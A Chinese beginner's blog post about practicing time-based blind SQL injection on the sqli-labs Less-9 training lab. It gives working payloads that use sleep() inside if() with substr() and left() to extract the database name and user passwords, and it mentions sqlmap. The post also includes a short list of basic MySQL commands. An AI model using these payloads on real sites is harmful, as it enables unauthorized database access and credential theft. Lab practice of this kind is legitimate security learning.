萌新學習sql注入3

2021-10-03 07:15:03 字數 2597 閱讀 2503

時間盲注和布林盲注很相似,不同的是時間注入是利用sleep()和benchmark()等函式使時間變長

最基礎的理論:

if(expr1,expr2,expr3),含義為:如果expr1為真,則執行expr2,為假則執行expr3

實驗環境:sqli-labs-less9

不管怎麼輸都是you are in…考慮時間盲注

?id=

1' and sleep(3

)--+

很明顯有延時

開始if語句

二分法求database()長度,不再演示

?id=

1' and if(substr(database(),1,1)='s',

sleep(3

),1)

--+

再求出資料庫名security,可用substr函式或left函式

爆表

?id=

這裡我就直接寫結果了

因為我知道有username和password,所有乙個乙個試,在第4列和12列的得到了結果。

?id=

1' and if(left((select password from users order by id limit 0,1),4)='dumb',

sleep(3

),1)

--+

這裡用dump試了一下,成功,手工注入實在受不了,寫指令碼或者拿sqlmap跑

參考大佬的筆記

sql盲注

sql盲注指令碼模板

sqli-labs6-10 盲注、基於時間,基於報錯(附指令碼)

show databases; 檢視資料庫

use dvwa;進入資料庫

select database(); 檢視當前資料庫

desc users; 檢視表列表

show tables;檢視庫中的表

select * from users;檢視表

增刪改查:

增:insert into 表名稱(列1,列2…) values (值1,值2…)

刪:delect from 表名稱 where 列名稱 = 值

改:update 表名稱 set 列名稱 = 新值 where 列名稱 = 某值

查:select * from 表名稱 select 列名稱 from 表名稱

我也不是十分了解資料庫,就這樣吧,明天繼續。幹了!奧力給!

萌新學習手冊 surf特徵檢測

演算法原理 includeusing namespace xfeatures2d 嗯,在開頭要包含這個庫然後申明命名空間 src imread c users pbiha desktop image 1.png imread grayscale imread grayscale就是0,表示讀入一張灰...

SQL注入基礎 3 報錯注入

1 考慮使用報錯注入 url url 由於多了乙個 sql語句執行時會報錯。而這裡程式直接將錯誤資訊輸出到了頁面上,所以可以利用報錯注入來獲取資料。2 獲取user 的值 報錯注入有多種格式,這裡使用updatexml 函式,其中0x7e為ascii編碼,解碼為 語句 and updatexml 1...

SQL注入詳解 3

第三節 判斷資料庫型別及注入方法 不同的資料庫的函式 注入方法都是有差異的,所以在注入之前,我們還要判斷一下資料庫的型別。一般asp 最常搭配的資料庫是access 和sqlserver 網上超過99 的 都是其中之一。怎麼讓程式告訴你它使用的什麼資料庫呢?來看看 sqlserver 有一些系統變數...